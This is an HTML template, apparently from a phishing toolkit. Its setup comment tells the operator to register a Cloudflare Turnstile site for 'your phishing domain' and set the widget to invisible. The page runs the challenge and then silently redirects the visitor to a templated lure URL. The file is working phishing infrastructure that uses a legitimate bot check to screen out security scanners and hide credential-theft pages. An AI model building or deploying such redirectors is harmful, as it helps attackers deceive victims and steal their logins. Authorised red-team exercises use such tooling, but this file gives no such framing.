<!--
    1. Create a new Turnstile Site in your Cloudflare dashboard
    2. Set 'Domain'' to your phishing domain e.g. my.phishing.domain.com.
    3. Set 'Widget Mode' to 'Invisible' to hide the Cloudflare widget and remove the interactive checks (change to managed if needed).
    4. Copy the value of 'Site Key' and replace the value used in this file at `sitekey:`.
-->

<html>
<head>
    <title>Turnstile Redirector Demo</title>
    <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script>
</head>
<body>

Loading...
<div id="cf-turnstile"></div>

<script>
turnstile.ready(function () {
        turnstile.render('#cf-turnstile', {
            sitekey: '1x00000000000000000000BB', // replace this with your own sitekey
            callback: function(token) {
                window.location.assign({lure_url_js});
            },
        });
    });
</script>
</body>
</html>